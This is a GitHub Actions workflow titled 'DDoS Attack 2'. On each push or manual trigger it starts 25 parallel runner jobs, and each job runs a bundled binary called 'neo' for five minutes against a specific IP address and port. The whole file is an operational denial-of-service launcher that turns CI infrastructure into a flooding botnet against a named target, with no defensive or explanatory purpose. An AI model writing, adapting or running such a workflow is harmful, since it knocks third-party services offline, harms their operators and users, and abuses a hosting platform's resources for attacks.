name: DDoS Attack 2
on: [push, workflow_dispatch]

jobs:
    attack:
        runs-on: ubuntu-22.04
        strategy:
            matrix:
                count: [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25]
        steps:
        - uses: actions/checkout@v3
        - run: chmod +x neo
        - run: timeout 300 ./neo 20.235.52.217 16680 120 999
